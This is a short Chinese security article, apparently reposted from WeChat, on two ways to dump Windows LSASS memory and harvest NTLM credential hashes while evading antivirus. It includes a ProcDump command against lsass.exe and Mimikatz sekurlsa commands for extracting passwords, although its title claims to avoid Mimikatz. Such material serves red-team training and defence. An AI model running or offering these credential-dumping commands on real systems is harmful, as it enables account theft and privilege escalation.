本地安全机构子系统服务(或更广为人知的 LSASS)是 Windows 服务器的核心软件之一。它负责在系统上执行安全策略。它验证连接到 Windows 计算机或服务器的用户、处理密码更改并创建访问令牌。
因为它是重要的软件,所以它始终是黑客的目标,黑客会尝试提取您的信息以便在 Active Directory 中提升权限(例如通过 NTLM 哈希转储)。
第一种方法:使用 Procump
ProcDump 是一个命令行应用程序,用于监控应用程序的 CPU 峰值并在峰值期间创建内存转储。如果恶意用户拥有计算机的管理权限,他就能从 Lsass 的内存中转储数据,并可能获取敏感信息。
.procdump64.exe -accepteula -ma lsass.exe lsass.txt
1ª:执行 ProcDump
sekurlsa::minidump lsass.txt.dump
sekurlsa::logonpasswords
2:提取哈希值
第二种方法:任务管理器
任务管理器是 Microsoft Windows 系统附带的任务管理器、系统监视器和启动管理器。它允许用户转储包括 Lsass 在内的进程的信息。如果您可以访问计算机的远程桌面协议 (RDP),那么这是一个不错的选择,尤其是当您拥有强大的保护解决方案时。
4ª:输出路径
5ª:提取的信息
结论
当 Active Directory 中存在保护解决方案时,所提出的方法非常有用,因为可执行文件是合法的,因此大多数防病毒软件不会将其检测为恶意条目。
原文始发于微信公众号(Ots安全):不使用 Mimikatz 转储 Lsass 的两种方法
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论